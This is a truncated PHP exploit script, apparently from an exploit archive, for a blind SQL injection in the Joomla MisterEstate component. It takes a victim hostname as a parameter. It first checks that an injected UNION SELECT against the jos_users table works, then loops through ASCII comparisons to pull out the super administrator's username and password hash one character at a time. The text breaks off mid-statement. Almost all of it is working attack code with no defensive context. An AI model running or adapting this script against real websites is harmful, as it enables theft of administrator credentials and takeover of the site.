Joomla Component MisterEstate Blind SQL Injection Exploit';
  // http://www.misterestate.com/
  ini_set( "memory_limit", "512M" );
                ini_set( "max_execution_time", 0 );
                set_time_limit( 0 );
                if( !isset( $_GET['url'] ) ) die( 'Usage: '.$_SERVER['SCRIPT_NAME'].'?url=www.victim.com' );
  $url = "http://".$_GET['url']."/index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component";
  $data = array();
  $data['src_cat'] = 0;
  $data['country'] = 'no';
  $data['state'] = 'no';
  $data['town'] = 'no';
  $data['district'] = 'no';
  $data['mesearch'] = 'Start Search';
  $admin = '';
  $output = getData( "1%') AND 1=2 UNION SELECT id FROM jos_users WHERE gid=25 ORDER BY id ASC LIMIT 1 -- '" );
  if( !testData( $output ) ) die('failed');
  echo '
Check passed... trying exploit...
';
 
  for( $i=0;$i<250;$i++ )
  {
    for( $j=48; $j<126; $j++ )
    {
      $output = getData( "1%') AND 1=2 UNION SELECT id FROM jos_users WHERE gid=25 AND ASCII(SUBSTRING(CONCAT(username,0x3a,password),$i,1)) = $j ORDER BY id ASC LIMIT 1 -- '" );
      if( testData( $output ) )
      {
        ob_end_clean();
        $admin .= chr( $j );
        echo "Found character $i : buffer is now $admin
";
      }
      ob_end_clean();
    }
  }
  echo "